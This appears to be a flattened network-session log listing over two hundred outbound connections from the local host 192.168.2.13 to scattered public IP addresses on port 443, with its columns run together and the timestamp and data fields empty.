                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20329192.168.2.133372451.63.190.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20330192.168.2.1356132186.244.181.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20331192.168.2.1334198190.136.147.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20332192.168.2.1333974203.180.44.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20333192.168.2.1358128103.41.87.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20334192.168.2.135910652.255.241.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20335192.168.2.133652085.158.154.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20336192.168.2.134809062.71.245.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20337192.168.2.1360084184.198.167.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20338192.168.2.135191619.88.1.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20339192.168.2.134403843.76.14.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20340192.168.2.135020444.83.228.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20341192.168.2.1343690200.130.209.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20342192.168.2.133516465.119.48.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20343192.168.2.1337898172.164.13.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20344192.168.2.1337072114.18.178.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20345192.168.2.1354742135.47.104.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20346192.168.2.1349394172.149.224.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20347192.168.2.1335612209.67.148.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20348192.168.2.1332778208.61.36.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20349192.168.2.135410023.166.237.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20350192.168.2.134857844.67.203.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20351192.168.2.134488660.167.188.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20352192.168.2.1349636191.65.96.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20353192.168.2.1359380182.160.26.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20354192.168.2.134602062.25.158.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20355192.168.2.1337922147.211.238.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20356192.168.2.1351586176.67.55.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20357192.168.2.1347228105.236.46.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20358192.168.2.1343078174.199.204.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20359192.168.2.134842014.78.224.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20360192.168.2.1355460173.49.168.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20361192.168.2.134501861.207.181.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20362192.168.2.133889431.233.144.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20363192.168.2.134346293.252.243.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20364192.168.2.1340508212.20.148.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20365192.168.2.135797084.131.157.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20366192.168.2.1358930138.222.54.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20367192.168.2.1342438170.101.115.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20368192.168.2.133282889.244.4.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20369192.168.2.1355516145.170.175.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20370192.168.2.135327042.195.246.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20371192.168.2.133554850.239.85.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20372192.168.2.1333750136.154.77.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20373192.168.2.1357316121.221.87.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20374192.168.2.13434045.221.152.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20375192.168.2.1342312177.75.180.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20376192.168.2.134812231.159.184.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20377192.168.2.1339428188.163.136.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20378192.168.2.1346290102.150.252.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20379192.168.2.1343270190.134.7.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20380192.168.2.1333474183.232.154.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20381192.168.2.1360076161.165.107.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20382192.168.2.13585744.104.66.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20383192.168.2.134678874.17.212.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20384192.168.2.1358614135.90.241.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20385192.168.2.133782638.189.168.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20386192.168.2.1357162147.8.174.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20387192.168.2.1346886132.240.135.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20388192.168.2.133416468.39.134.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20389192.168.2.134305644.32.5.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20390192.168.2.1353504160.182.78.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20391192.168.2.1350908138.163.72.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20392192.168.2.1353642206.195.84.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20393192.168.2.1336274155.138.23.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20394192.168.2.1344274161.0.224.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20395192.168.2.13455784.255.130.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20396192.168.2.135858473.13.110.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20397192.168.2.1333936180.38.149.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20398192.168.2.133931264.36.34.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20399192.168.2.134186864.188.226.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20400192.168.2.133599467.218.41.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20401192.168.2.133752081.139.62.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20402192.168.2.1346188179.82.179.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20403192.168.2.134901470.127.1.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20404192.168.2.1354624190.253.125.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20405192.168.2.134618443.109.41.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20406192.168.2.1351744182.183.246.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20407192.168.2.1357340128.45.4.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20408192.168.2.1334486160.196.246.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20409192.168.2.1342614159.40.208.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20410192.168.2.135918896.101.30.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20411192.168.2.133915878.208.171.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20412192.168.2.1355706160.125.230.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20413192.168.2.133413447.177.187.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20414192.168.2.13558869.55.124.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20415192.168.2.1341112126.222.194.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20416192.168.2.134404231.54.123.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20417192.168.2.1344222193.119.222.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20418192.168.2.1334056177.18.10.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20419192.168.2.1354290100.169.193.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20420192.168.2.1348228192.2.98.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20421192.168.2.1345216198.88.226.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20422192.168.2.136087470.161.77.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20423192.168.2.1340068165.124.104.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20424192.168.2.1351784187.142.70.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20425192.168.2.1350198174.25.187.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20426192.168.2.135759831.25.250.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20427192.168.2.135418294.7.173.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20428192.168.2.133446660.134.247.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20429192.168.2.134759058.34.178.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20430192.168.2.135053047.115.136.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20431192.168.2.134432824.99.85.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20432192.168.2.1355720134.189.40.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20433192.168.2.135517873.117.162.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20434192.168.2.135239051.177.25.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20435192.168.2.1346984206.180.81.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20436192.168.2.1345306106.82.139.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20437192.168.2.133468890.30.143.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20438192.168.2.1342458143.150.92.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20439192.168.2.134090885.11.36.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20440192.168.2.1357472185.186.61.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20441192.168.2.1352812210.199.166.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20442192.168.2.13563081.178.78.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20443192.168.2.133802244.147.121.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20444192.168.2.1341120216.228.194.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20445192.168.2.1345010187.248.241.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20446192.168.2.136043288.82.26.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20447192.168.2.1342582213.216.176.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20448192.168.2.1354788101.58.242.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20449192.168.2.1358890184.229.213.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20450192.168.2.1356426104.53.221.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20451192.168.2.134986684.120.180.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20452192.168.2.1342306221.41.188.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20453192.168.2.1343454145.9.51.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20454192.168.2.133685639.112.219.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20455192.168.2.134640894.71.179.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20456192.168.2.1351784117.234.19.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20457192.168.2.1342382173.0.196.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20458192.168.2.1355164131.103.124.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20459192.168.2.1347798190.74.10.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20460192.168.2.13564362.0.63.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20461192.168.2.1360918105.93.51.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20462192.168.2.1351214222.59.66.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20463192.168.2.1337616162.29.81.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20464192.168.2.1348806191.155.112.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20465192.168.2.1351346160.118.96.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20466192.168.2.1360740217.218.21.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20467192.168.2.13608221.190.236.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20468192.168.2.135553295.128.236.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20469192.168.2.134339457.8.142.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20470192.168.2.136000882.87.151.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20471192.168.2.1352862135.127.9.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20472192.168.2.1332784145.178.66.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20473192.168.2.1339922132.6.141.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20474192.168.2.1335800192.119.217.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20475192.168.2.134689492.45.199.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20476192.168.2.134650085.110.250.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20477192.168.2.1335566125.212.27.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20478192.168.2.135583693.255.16.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20479192.168.2.133388013.57.97.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20480192.168.2.1346832199.102.106.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20481192.168.2.133284860.247.226.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20482192.168.2.135391013.188.91.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20483192.168.2.1346612173.147.49.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20484192.168.2.133277425.11.25.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20485192.168.2.1350662213.123.196.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20486192.168.2.133590665.86.253.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20487192.168.2.1344074136.71.21.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20488192.168.2.1339070213.230.230.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20489192.168.2.1349766220.159.31.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20490192.168.2.134465638.228.52.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20491192.168.2.1334686126.97.80.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20492192.168.2.1337686181.148.179.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20493192.168.2.1335998140.135.59.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20494192.168.2.1338854158.126.27.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20495192.168.2.134379485.179.229.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20496192.168.2.1357274166.105.253.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20497192.168.2.1354134159.20.170.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20498192.168.2.1352226221.135.198.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20499192.168.2.1335708180.177.11.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20500192.168.2.1341456137.88.190.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20501192.168.2.1339196195.194.57.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20502192.168.2.1346878134.31.167.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20503192.168.2.1349260190.4.216.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20504192.168.2.1333058173.238.191.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20505192.168.2.135363857.196.186.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20506192.168.2.13524761.207.102.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20507192.168.2.1333940183.213.218.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20508192.168.2.1334390101.47.14.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20509192.168.2.1340446104.218.41.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20510192.168.2.1340866119.249.125.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20511192.168.2.1338098123.202.179.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20512192.168.2.135739281.116.180.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20513192.168.2.1343276187.7.91.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20514192.168.2.1333064145.83.122.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20515192.168.2.1350840171.26.99.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20516192.168.2.1344320165.136.230.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20517192.168.2.135539272.23.72.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20518192.168.2.135379057.85.46.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20519192.168.2.1348988117.208.238.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20520192.168.2.1335476123.66.82.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20521192.168.2.1360670101.90.175.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20522192.168.2.1345790172.121.195.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20523192.168.2.1341710171.174.129.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20524192.168.2.1337656176.135.215.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20525192.168.2.1354424104.47.92.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20526192.168.2.1344542148.238.163.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20527192.168.2.1333522104.122.21.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20528192.168.2.1353394207.243.127.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20529192.168.2.1349474190.115.87.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20530192.168.2.1335798205.181.246.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20531192.168.2.1345222157.178.47.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20532192.168.2.1338634199.106.8.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20533192.168.2.1352788191.78.29.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20534192.168.2.1343232116.202.96.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20535192.168.2.1341966181.140.62.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20536192.168.2.1336722218.249.7.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20537192.168.2.1357740172.151.201.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20538192.168.2.135019064.49.110.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20539192.168.2.1351370165.224.82.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20540192.168.2.1346818213.70.131.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20541192.168.2.135489691.236.112.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20542192.168.2.135925841.164.16.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20543192.168.2.1352146194.134.116.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20544192.168.2.1343640133.61.222.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20545192.168.2.135189486.105.170.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20546192.168.2.13554341.88.65.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20547192.168.2.135756050.2.129.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20548192.168.2.1344728122.247.129.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20549192.168.2.133469638.139.44.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20550192.168.2.135355693.120.0.19443
